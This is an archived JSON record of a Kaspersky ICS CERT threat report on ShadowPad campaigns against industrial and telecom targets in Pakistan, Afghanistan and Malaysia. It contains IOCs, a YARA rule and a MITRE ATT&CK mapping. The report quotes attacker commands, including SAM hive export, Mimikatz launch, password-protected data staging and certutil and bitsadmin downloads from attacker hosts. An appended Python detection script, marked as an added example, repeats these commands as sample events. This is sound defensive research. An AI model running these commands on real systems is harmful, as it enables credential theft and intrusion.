{
	"id": "5b6bf0b2-9268-466f-9b60-b109d0791572",
	"created_at": "2026-04-06T00:12:56.431473Z",
	"updated_at": "2026-04-10T13:12:04.97088Z",
	"deleted_at": null,
	"sha1_hash": "c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b",
	"title": "Attacks on industrial control systems using ShadowPad | Kaspersky ICS CERT EN",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1034405,
	"plain_text": "Attacks on industrial control systems using ShadowPad |\r\nKaspersky ICS CERT EN\r\nBy Kaspersky ICS CERT Team\r\nPublished: 2022-06-27 · Archived: 2026-04-05 22:54:55 UTC\r\nExecutive summary\r\nInitial infection\r\nShadowPad\r\nPost-exploitation\r\nAdditional tools\r\nCobaltStrike\r\nPlugX backdoor – aro.dat\r\nBat file for credential theft\r\nWebshell\r\nInfrastructure\r\nVictims\r\nAttribution\r\nConclusion\r\nAppendix I – Indicators of Compromise\r\nAppendix II – MITRE ATT\u0026CK Mapping\r\nExecutive summary\r\nIn mid-October 2021 Kaspersky ICS CERT researchers uncovered an active ShadowPad backdoor infection on\r\nindustrial control systems (ICS) in Pakistan. Infected machines included engineering computers in building\r\nautomation systems that are part of the infrastructure of a telecommunications company.\r\nDuring the investigation researchers uncovered larger-scale activity by the threat actor in the network of the\r\ntelecommunications company and also identified other victims of the campaign. We found malicious artifacts in\r\norganizations in the industrial and telecommunications sectors in both Pakistan and Afghanistan. 
Moreover, another attack was uncovered that used an earlier but very similar set of tactics, techniques and procedures (TTPs) against a logistics and transport organization (a port) in Malaysia.\r\nApparently, the wave of attacks uncovered by the experts began in March 2021.\r\nSome of the victim organizations were breached by exploiting the CVE-2021-26855 vulnerability in Microsoft Exchange.\r\nDuring the investigation we found additional tools and commands used by the threat actor after the initial infection.\r\nhttps://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/\r\nPage 1 of 12\r\nFrom March to October 2021, the ShadowPad backdoor was downloaded to victim computers as the mscoree.dll file, which was launched by AppLaunch.exe – a perfectly legitimate application.\r\nLater the attackers launched ShadowPad using DLL hijacking in a legitimate OLE-COM object viewing application (OleView).\r\nAfter the initial infection the attackers first sent commands manually, then automatically.\r\nOther tools were also used:\r\nThe CobaltStrike framework, which was downloaded to victim machines using the certutil.exe utility, compiled aspx web shells, and the procdump and Mimikatz tools;\r\nThe PlugX backdoor;\r\nBAT files (for stealing credentials);\r\nWeb shells (for remote access to the web server);\r\nThe Nextnet utility (for scanning network hosts).\r\nThe attackers used domains registered with NameSilo, GoDaddy.com and ENOM to communicate with the command-and-control (C2) servers. Most of the C2 servers were hosted on dedicated servers rented from Choopa.\r\nThe newly identified attacks on a variety of organizations share an almost entirely unique set of TTPs, which leads us to believe that the same Chinese-speaking threat actor was behind all of them.\r\nAt the time of writing, we do not know the ultimate goal of the attacker. 
We think it was probably data harvesting.\r\nWe believe that it is highly likely that this threat actor will strike again and we will find new victims in different countries.\r\nThe full report is available on the Kaspersky Threat Intelligence portal.\r\nFor more information please contact ics-cert@kaspersky.com.\r\nInitial infection\r\nIn mid-October 2021, Kaspersky ICS CERT experts discovered an active ShadowPad backdoor that affected a number of industrial control systems in Pakistan, specifically engineering computers in building automation systems that are part of a telecom company’s infrastructure. Further analysis of the attack revealed other organizations affected by it: manufacturing and telecommunications companies in Pakistan, a telecommunications company in Afghanistan, and a logistics and transport organization (a port) in Malaysia. Apparently, the wave of attacks uncovered by the experts began in March 2021.\r\nThe attackers exploited a known vulnerability in MS Exchange, CVE-2021-26855, as the initial attack vector in several victim organizations. We do not have evidence that CVE-2021-26855 was exploited in every case identified, but we can assume that the attackers could have used this vector to penetrate the other victims as well.\r\nIn the course of our investigation, we determined that at the beginning of March 2021 the ShadowPad backdoor was downloaded to the attacked computers under the guise of the mscoree.dll file, which was launched by the legitimate application AppLaunch.exe located in the same folder as ShadowPad. AppLaunch.exe was executed by creating a task in the Windows Task Scheduler.\r\nExport table of the malicious mscoree.dll (ShadowPad)\r\nIn some of the cases studied in the same period, a ShadowPad sample with the same name and launching scheme was deployed by exploiting the MS Exchange vulnerability CVE-2021-26855.\r\nSince about mid-October 2021, a new ShadowPad launching scheme and a new version of the malware have been used against the same organizations. Instead of using mscoree.dll, the attackers switched to the DLL hijacking technique in legitimate software for viewing OLE-COM objects (OleView). The legitimate OleView application loads the malicious IVIEWERS.dll library, which in turn loads and executes the ShadowPad payload contained in IVIEWERS.dll.dat.\r\nThe Windows Task Scheduler was also used for the new ShadowPad version to get a foothold in a system. 
In total, we managed to find 25 unique modifications.\r\nA more detailed analysis of some modifications of the new ShadowPad version is presented in a recent report published by PwC.\r\nPost-exploitation\r\nWe found that on a subset of computers (at least one in each attacked organization’s network), a series of commands had been executed remotely via the command line interface (cmd.exe).\r\nAt first, the attackers entered the commands manually (indicated both by the time intervals between commands and by the output not being redirected anywhere other than standard output).\r\nThe commands executed manually by the attackers are listed below in their original sequence, each followed by its description.\r\ncmd.exe /C arp -a > $temp\\gGjrIFGa.tmp 2>&1\r\n    -> output the current ARP cache table for all interfaces to a file in the $temp directory\r\nquser.exe\r\n    -> collect information about users logged on to the system\r\nnetstat -ano\r\nnetstat user\r\n    -> collect information about active users and network connections\r\nxcopy.exe /s $user\\desktop c:\\$recycle.bin\\temp\\■■■\\\r\n    -> copy all files from the desktop to the recycle.bin folder (it is worth noting that the organization’s domain name is also present in the path)\r\nping.exe 8,8,8,8\r\nping.exe google.com\r\nping.exe 167.179.64.62\r\n    -> check the availability of internet services, probably including the attackers’ infrastructure\r\nnet use \\\\10.126.209.24 “■■■■■■■” /u:■■\\■■■■■\r\n    -> mount a network share using a legitimate domain account\r\ncmd.exe m1.log\r\n    -> launch Trojan-PSW.Win32.Mimikatz (renamed to m1.log)\r\nreg.exe save hklm\\sam sam.hive\r\n    -> save the SAM registry hive, which contains the NTLM password hashes, to disk\r\ncmd.exe /C $programfiles\\winrar\\rar.exe a -r -hp1234 C:$recycle.bin\\10020111desk.rar $user\\desktop\\*.txt $user\\desktop\\*.xls* $user\\desktop\\*.pdf $user\\desktop\\*.doc* $user\\desktop\\*.jpg > $temp\\lwefqERM.tmp 2>&1\r\n    -> archive the collected files that potentially contain confidential information (the -hp switch encrypts both file data and archive headers with the given password)\r\nwinrar.exe a -r -ep1 -p3210 -m5 -s -iback nat temp\r\n    -> archive the files collected using the console version of WinRAR\r\n$windir\\appcompat\\programs\\xerice.exe 10.251.115.0/24\r\n    -> scan hosts on the network using the nextnet utility (an open-source tool written in Go)\r\nLater, the attackers began to distribute a malicious script for cmd.exe over the networks of attacked organizations. The script was almost completely identical (in terms of its contents and the sequence of commands) to the manual activity sequence detected earlier, but it redirected the output of the commands to a file.\r\nThe cmd.exe script that was discovered was not only delivered over the network, but was also added by the attackers to the task scheduler for daily execution.\r\nExample of a script designed to automate the process of collecting data on attacked computers\r\nIt is important to note that this part of the TTPs is quite unique and we believe it supports attributing all cases of similar activity to one Chinese-speaking group of attackers.\r\nThe artifacts found indicate that the attackers stole domain authentication credentials for at least one account in each attacked organization (probably from the same computer that was used to penetrate the network). 
These credentials were used to spread the attack further over the network, first manually and then in automatic mode.\r\nAdditional tools\r\nCobaltStrike\r\nThe attackers used CobaltStrike, which was downloaded to the victim’s computer using the certutil.exe utility, as well as compiled aspx web shells, the procdump tool, and Mimikatz.\r\nCobaltStrike was downloaded using the following command:\r\n\"$system32\\cmd.exe\" /c certutil.exe -urlcache -split -f hxxp://116.206.92[.]26:82/update.exe &&\r\nPlugX backdoor – aro.dat\r\nIn addition to the ShadowPad backdoor, activity associated with downloading aro.dat, a variant of the PlugX backdoor, using bitsadmin was identified on the server of one of the victims.\r\nDownloading the aro.dat backdoor\r\nA description of the PlugX backdoor is provided in an article published by Palo Alto Networks.\r\nBat file for credential theft\r\nA bat file was found on the mail server of one of the victims, which the attackers used to collect information and steal the NTLM hashes of accounts.\r\nBat file found on a victim’s server\r\nThe contents of this file are very similar to the bat file described in a VB article, which mentions that the script was used by the Chinese group HAFNIUM.\r\nWebshell\r\nMalicious dll files were found on the victims’ mail servers. These are compiled .NET assemblies of aspx scripts, used by the actor for remote access to the web server (web shell).\r\nExample of a malicious dll web shell\r\nThe default command sequence sent to the victim’s web shell had been seen earlier with the well-known China Chopper web shell:\r\n\"cmd\" /c cd /d \"C:/inetpub/wwwroot/aspnet_client\"&whoami&echo [S]&cd&echo [E]\"\r\nInfrastructure\r\nThe ShadowPad C2 servers found are mostly hosted on dedicated servers rented from Choopa.\r\nDomain | IP (first seen) | ASN\r\norder.cargobussiness[.]site | 45.77.249[.]48 (March 24, 2021) | 20473\r\ndocuments.kankuedu[.]org | 45.76.54[.]156 (March 23, 2021) | 20473\r\nlive.musicweb[.]xyz | 192.248.151[.]110 (March 17, 2021) | –\r\nobo.videocenter[.]org | – (May 21, 2021) | –\r\ntech.obj[.]services | 108.160.133[.]247 (October 21, 2021); 103.152.255[.]82 (October 18, 2021) | 20473\r\nhouwags.defineyourid[.]site | 107.191.47[.]52 (October 28, 2021); 198.13.44[.]48 (October 13, 2021); 95.179.142[.]104 (October 29, 2021) | 20473\r\nnoub.crabdance[.]com | 45.77.243[.]204 (October 02, 2021); 45.32.101[.]196 (October 19, 2021); 95.179.142[.]104 (October 28, 2021); 192.248.180[.]109 (October 28, 2021) | 20473\r\ngrandfoodtony[.]com | – | –\r\nVictims\r\nWe identified malicious artifacts in organizations located in Pakistan and Afghanistan and operating in the manufacturing and telecom sectors. 
The attack using older TTPs and exploiting the Microsoft Exchange vulnerability also targeted a logistics and transport organization (a port) in Malaysia.\r\nAttribution\r\nWe believe with a high degree of confidence that a Chinese-speaking threat actor is behind the activity described in this report.\r\nThere are some minor references to HAFNIUM, a Chinese-speaking threat actor, but they are not sufficient to speak of HAFNIUM’s involvement in the attacks described in this report with a high degree of confidence:\r\nThe Mimikatz utility (m1.log, SHA256: 30a78770615c6b42c17900c4ad03a9b708dc2d9b743bbdc51218597518749382), which was identified during our investigation on computers of organizations in Pakistan, Malaysia, and Afghanistan, was also mentioned in a Symantec report. That report also claims that the threat actor HAFNIUM was involved in attacks exploiting a Microsoft Exchange Server vulnerability.\r\nIn addition, a bat file for stealing the NTLM hashes of accounts was found on a server of one of the victims. The contents of the bat file are very similar to the bat file described in the VB article, which mentions that this script was used by HAFNIUM.\r\nActivity related to downloading the PlugX backdoor (aro.dat), which occurred on the server of one of the victims, was analyzed in the Palo Alto Networks report, which alleges the involvement of a Chinese group known as PKPLUG.\r\nConclusion\r\nAs mentioned above, building automation systems were among the systems attacked in the campaign described in this report. We often see accidental infections on such systems, but they are rare targets for APT actors. Although the final goals of the attack remain unknown, the attackers are most likely interested in gathering information. We strongly believe that those systems themselves could be a valuable source of highly confidential information. Additionally, we believe there is a chance that they also provide attackers with a backdoor to other, more strictly secured, infrastructure.\r\nThe attackers’ TTPs enabled us to link these attacks to a Chinese-speaking threat actor, and we observed victims located in different regions. This means that the actor we have identified may have broader geographical interests, and we can expect more victims to be discovered in different countries in the future.\r\nAppendix I – Indicators of Compromise\r\nShadowPad (mscoree.dll), MD5:\r\n91131CCF507F61279268FA857AB53463\r\n8D5807D8EE69E472764FAEE7269B460B\r\n1A5856C343597DC219E3F5456018612B\r\n27F636A36207581E75C700C0E36A8031\r\nShadowPad (iviewers.dll), MD5:\r\n011BEAF3E9CD2896479313772CD591DE\r\nA7F3BF89F0B41704F185545C784B8457\r\n35912C914BD84F23203C8FADAC6D0548\r\n299980C914250BAC7522DE849F6DF24F\r\n381616642D2567F8872B150B37E5196B\r\n31FDAE0B71C290440E0B465B17CF3C8D\r\n420FCF11240589E8D29DAAB08251831D\r\n40CD646554ED42D385CA6B55B9D3397D\r\n61BA23B3B3D132FE0825907C0EA58399\r\n0CAC537476FD71763C07EDFD7D831F0F\r\n80EE7A1E9AD4AC6AFCAC83087DC5360F\r\nBat file for credential theft, MD5:\r\n74E43ECA18E8C92CB332BBB671CE13B8\r\nTrojan-PSW.Win32.Mimikatz.eni (m1.log), MD5:\r\nC024E5163AB6DD844813BF0D9A6F082B\r\nNextnet (xerice.exe), MD5:\r\n86B25E416EEE0F5FB17370F3929E45F4\r\n8EE863C926D6847D1BF767783E700248\r\nDomains and IPs (ShadowPad C&C)\r\nhttps://order.cargobussiness[.]site\r\nhttps://documents.kankuedu[.]org\r\nhttps://live.musicweb[.]xyz\r\nhttps://obo.videocenter[.]org\r\nhttps://tech.obj[.]services\r\nhttps://houwags.defineyourid[.]site\r\nhttps://noub.crabdance[.]com\r\nhttps://grandfoodtony[.]com\r\nCobaltStrike hosting and C&C\r\nstorage.ondriev[.]tk 
116.206.92[.]26\r\napi.onedriev[.]tk 69.172.80[.]131\r\nYara rule (update)\r\nWe would like to thank John Southworth (@BitsOfBinary) from PwC for suggesting improvements to the YARA rule.\r\nimport \"pe\"\r\n\r\nrule apt_shadowpad_iviewers_dll_variant\r\n{\r\n    meta:\r\n        description = \"Rule for detecting Shadowpad iviewers.dll variant\"\r\n        author = \"Kaspersky\"\r\n        copyright = \"Kaspersky\"\r\n        distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THRE\"\r\n        version = \"1.0\"\r\n        last_modified = \"2022-01-20\"\r\n        hash = \"011BEAF3E9CD2896479313772CD591DE\"\r\n        hash = \"A7F3BF89F0B41704F185545C784B8457\"\r\n        hash = \"35912C914BD84F23203C8FADAC6D0548\"\r\n        hash = \"299980C914250BAC7522DE849F6DF24F\"\r\n    strings:\r\n        $viewers = \"VIEWER.dll\" fullword\r\n        $Iviewers = \"IVIEWERS.dll\"\r\n        $oleview = \"OLEViewer\"\r\n        $comapi = \"viewer Copyright\" wide\r\n    condition:\r\n        // a DLL carrying the names used in the OleView side-loading scheme ...\r\n        uint16(0) == 0x5A4D and filesize < 2MB and pe.is_dll() and ($Iviewers or $comapi or $viewers) and\r\n        (\r\n            // ... that is neither Microsoft-signed nor the genuine OLEViewer build\r\n            not for any i in (0 .. pe.number_of_signatures) : (pe.signatures[i].subject contains \"O=Microsoft\")\r\n            and not $oleview\r\n        )\r\n}\r\nAppendix II – MITRE ATT&CK Mapping\r\nThis table contains all the TTPs identified in the analysis of the activity described in this report.\r\nTactic | Technique | Technique Name | Description\r\nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | The attacker uses a PowerShell script to download and execute additional payloads.\r\nExecution | T1053.005 | Scheduled Task/Job: Scheduled Task | The attacker creates scheduled tasks for daily execution of malicious payloads.\r\nExecution | T1047 | Windows Management Instrumentation | The attacker creates a WMI event to execute an information gathering tool on startup.\r\nPersistence | T1197 | BITS Jobs | The attacker uses a BITS job to download additional payloads.\r\nPersistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading | The attacker leverages a legitimate binary to load ShadowPad.\r\nPersistence | T1053.005 | Scheduled Task/Job: Scheduled Task | The attacker creates scheduled tasks to set up daily execution of malicious payloads.\r\nDefense Evasion | T1197 | BITS Jobs | The attacker uses a BITS job to download additional payloads.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | Downloaded tools are encoded with base64.\r\nDefense Evasion | T1222.001 | File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The attacker uses attrib to change the attributes of the malicious files and the working directory to hide them.\r\nDefense Evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | The attacker uses attrib to change the attributes of the malicious files and the working directory to hide them.\r\nDefense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | The attacker leverages a legitimate binary to load ShadowPad.\r\nDiscovery | T1083 | File and Directory Discovery | The attacker lists files and directories available on infected systems.\r\nDiscovery | T1046 | Network Service Scanning | The attacker uses a pentesting tool to list the NETBIOS services.\r\nDiscovery | T1012 | Query Registry | The attacker queries the registry to get a history of connected USB devices.\r\nCollection | T1560.001 | Archive Collected Data: Archive via Utility | The attacker uses the rar tool to create a password-protected archive.\r\nCollection | T1560.002 | Archive Collected Data: Archive via Library | The attacker compresses the data with a password using the Zip library.\r\nCollection | T1119 | Automated Collection | The attacker automatically collects a list of files and connected USB devices.\r\nCollection | T1005 | Data from Local System | The attacker uses a PowerShell script to collect Office documents on the local system.\r\nCollection | T1114.001 | Email Collection: Local Email Collection | The attacker specifically exfiltrates .pst archives.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | The attacker uses web protocols to download additional tools, exfiltrate data and operate the malware.\r\nCommand and Control | T1132.001 | Data Encoding: Standard Encoding | The data is encoded using compression with a password.\r\nCommand and Control | T1090.001 | Proxy: Internal Proxy | The attacker uses netcat and Stowaway-Node to create tunnels inside the victim network.\r\nCommand and Control | T1090.002 | Proxy: External Proxy | The attacker uses netcat and Stowaway-Node to create tunnels to the outside of the network.\r\nExfiltration | T1020 | Automated Exfiltration | The attacker can automatically exfiltrate Office documents.\r\nExfiltration | T1041 | Exfiltration Over C2 Channel | The attacker exfiltrates data over the C2 channel.\r\nExfiltration | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage | The attacker exfiltrates data to Google Drive.
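As an added example (not part of the Kaspersky ICS CERT report), the command lines quoted in the Post-exploitation and Additional tools sections above are turned into detection rules that a SOC could run over process-creation telemetry. The host names, user names, file paths and the 203.0.113.10 download host in the sample events are constructed for the example, the (host, user, command line) event layout is an assumption about the log source, and two rules generalise slightly beyond the report: the hive-export rule also covers the SECURITY and SYSTEM hives, and the BITS rule accepts /addfile as well as /transfer.

```python
'''Command-line triage for the post-exploitation chain described in this report.

Added example, not code from the Kaspersky ICS CERT report. Each rule encodes one
command-line pattern quoted in the report; the sample events are constructed and
the (host, user, command line) layout is an assumption about the telemetry source.
'''
from collections import defaultdict

BS = chr(92)  # one backslash, built at runtime so the listing itself needs no escape sequences


def normalize(cmdline):
    '''Lower-case, unify path separators and collapse whitespace before matching.'''
    return ' '.join(cmdline.replace(BS, '/').lower().split())


def is_cidr(token):
    '''True for an IPv4 prefix such as 10.251.115.0/24 (the nextnet scan argument).'''
    if token.count('/') != 1:
        return False
    addr, bits = token.split('/')
    octets = addr.split('.')
    return (len(octets) == 4 and all(o.isdigit() and int(o) <= 255 for o in octets)
            and bits.isdigit() and int(bits) <= 32)


# (rule name, severity, predicate over the normalised command line c and its tokens t);
# paths below are written with forward slashes because normalize() rewrites them that way
RULES = [
    # reg.exe save hklm/sam sam.hive; SECURITY and SYSTEM hives added as a generalisation
    ('sam_hive_export', 5, lambda c, t: ('reg save ' in c or 'reg.exe save ' in c)
        and any(h in c for h in ('hklm/sam', 'hklm/security', 'hklm/system'))),
    # rar.exe a -r -hp1234 ... or winrar.exe a ... -p3210: password-protected archive
    ('rar_password_archive', 4, lambda c, t: 'rar.exe a ' in c
        and any(x.startswith(('-hp', '-p')) for x in t)),
    # xcopy into c:/$recycle.bin/temp/... and the rar output placed there
    ('staging_in_recycle_bin', 3, lambda c, t: '$recycle.bin' in c),
    # certutil.exe -urlcache -split -f hxxp://.../update.exe (CobaltStrike download)
    ('certutil_urlcache_download', 4, lambda c, t: 'certutil' in c and '-urlcache' in t
        and any('://' in x for x in t)),
    # bitsadmin fetching aro.dat (PlugX); /addfile added as a generalisation
    ('bitsadmin_transfer', 3, lambda c, t: 'bitsadmin' in c and ('/transfer' in t or '/addfile' in t)),
    # $windir/appcompat/programs/xerice.exe 10.251.115.0/24 (nextnet scan)
    ('appcompat_subnet_scan', 4, lambda c, t: '/appcompat/programs/' in c and any(is_cidr(x) for x in t)),
    # cmd.exe m1.log: Mimikatz renamed to a non-executable extension
    ('cmd_runs_log_file', 4, lambda c, t: t[0].endswith('cmd.exe') and len(t) == 2 and t[1].endswith('.log')),
    # net use //host password /u:domain/user
    ('net_use_explicit_creds', 2, lambda c, t: t[:2] == ['net', 'use']
        and any(x.startswith(('/u:', '/user:')) for x in t)),
    # China Chopper default probe: whoami&echo [S]&cd&echo [E]
    ('china_chopper_default', 5, lambda c, t: 'whoami' in c and 'echo [s]' in c and 'echo [e]' in c),
    # arp -a / quser / netstat -ano: benign alone, counted only as part of a chain
    ('host_recon', 1, lambda c, t: any(x in c for x in ('arp -a', 'netstat -ano', 'quser'))),
]


def triage(events):
    '''Return (host, user, rule, command line) for every rule each event matches.'''
    hits = []
    for host, user, cmdline in events:
        c = normalize(cmdline)
        t = c.split()
        if not t:
            continue
        for name, _severity, pred in RULES:
            if pred(c, t):
                hits.append((host, user, name, cmdline))
    return hits


def score_hosts(events):
    '''Sum the severities of the distinct rules each host triggered, so the chain in
    the report lights up one host while a lone netstat or reg query stays low.'''
    severity = {name: s for name, s, _pred in RULES}
    fired = defaultdict(set)
    for host, _user, name, _cmd in triage(events):
        fired[host].add(name)
    return {host: sum(severity[n] for n in names) for host, names in fired.items()}


def hosts_over(events, threshold=8):
    '''Hosts whose score reaches the threshold, sorted for stable output.'''
    return sorted(h for h, s in score_hosts(events).items() if s >= threshold)


# Constructed sample events: hosts, users, paths and 203.0.113.10 are placeholders;
# the command lines follow the report.
_U = 'CORP' + BS + 'svc_bms'
_W = 'IIS APPPOOL' + BS + 'MSExchange'
SAMPLE_EVENTS = [
    ('eng-ws01', _U, f'cmd.exe /C arp -a > C:{BS}Windows{BS}Temp{BS}gGjrIFGa.tmp 2>&1'),
    ('eng-ws01', _U, 'quser.exe'),
    ('eng-ws01', _U, 'netstat -ano'),
    ('eng-ws01', _U, f'xcopy.exe /s C:{BS}Users{BS}svc_bms{BS}Desktop c:{BS}$recycle.bin{BS}temp{BS}corp{BS}'),
    ('eng-ws01', _U, f'net use {BS}{BS}10.126.209.24 REDACTED /u:CORP{BS}svc_bms'),
    ('eng-ws01', _U, 'cmd.exe m1.log'),
    ('eng-ws01', _U, f'reg.exe save hklm{BS}sam sam.hive'),
    ('eng-ws01', _U, f'cmd.exe /C C:{BS}Program Files{BS}WinRAR{BS}rar.exe a -r -hp1234 '
                     f'C:{BS}$recycle.bin{BS}10020111desk.rar C:{BS}Users{BS}svc_bms{BS}Desktop{BS}*.doc* '
                     f'> C:{BS}Windows{BS}Temp{BS}lwefqERM.tmp 2>&1'),
    ('eng-ws01', _U, f'C:{BS}Windows{BS}appcompat{BS}programs{BS}xerice.exe 10.251.115.0/24'),
    ('mail01', _W, 'cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.10:82/update.exe update.exe'),
    ('mail01', _W, 'cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&whoami&echo [S]&cd&echo [E]'),
    ('mail01', _W, 'bitsadmin /transfer job1 /download /priority high http://203.0.113.10/aro.dat C:/ProgramData/aro.dat'),
    ('fs02', 'CORP' + BS + 'admin', 'netstat -ano'),
    ('fs02', 'CORP' + BS + 'admin', 'ping.exe 8.8.8.8'),
    ('fs02', 'CORP' + BS + 'admin', f'reg.exe query hklm{BS}software'),
]

if __name__ == '__main__':
    for host, _user, rule, cmd in triage(SAMPLE_EVENTS):
        print(f'{host:9}{rule:28}{cmd}')
    print('scores:', score_hosts(SAMPLE_EVENTS), 'over threshold:', hosts_over(SAMPLE_EVENTS))
```

Scoring the distinct rules per host, rather than alerting on each line, is what separates the chain in the report (recon, SAM export, staging under $Recycle.Bin, password-protected archive, subnet scan) from an administrator who runs netstat once; the threshold of 8 is arbitrary and should be tuned against your own baseline.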
\r\nAuthors\r\nKirill Kruglov\r\nSenior Research Developer, Kaspersky ICS CERT\r\nArtem Snegirev\r\nSecurity Researcher, Kaspersky ICS CERT\r\nSource: https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/"
	],
	"report_names": [
		"attacks-on-industrial-control-systems-using-shadowpad"
	],
	"threat_actors": [
		{
			"id": "93542ae8-73cb-482b-90a3-445a20663f15",
			"created_at": "2022-10-25T16:07:24.058412Z",
			"updated_at": "2026-04-10T02:00:04.853499Z",
			"deleted_at": null,
			"main_name": "PKPLUG",
			"aliases": [
				"Stately Taurus"
			],
			"source_name": "ETDA:PKPLUG",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7c969685-459b-4c93-a788-74108eab6f47",
			"created_at": "2023-01-06T13:46:39.189751Z",
			"updated_at": "2026-04-10T02:00:03.241102Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"Red Dev 13",
				"Silk Typhoon",
				"MURKY PANDA",
				"ATK233",
				"G0125",
				"Operation Exchange Marauder"
			],
			"source_name": "MISPGALAXY:HAFNIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2704d770-43b4-4bc4-8a5a-05df87416848",
			"created_at": "2022-10-25T15:50:23.306305Z",
			"updated_at": "2026-04-10T02:00:05.296581Z",
			"deleted_at": null,
			"main_name": "HAFNIUM",
			"aliases": [
				"HAFNIUM",
				"Operation Exchange Marauder",
				"Silk Typhoon"
			],
			"source_name": "MITRE:HAFNIUM",
			"tools": [
				"Tarrask",
				"ASPXSpy",
				"Impacket",
				"PsExec",
				"China Chopper"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434376,
	"ts_updated_at": 1775826724,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.pdf",
		"text": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.txt",
		"img": "https://archive.orkl.eu/c23f5a16e0c9d8e1cc24ba947efd40fc29a2009b.jpg"
	}
}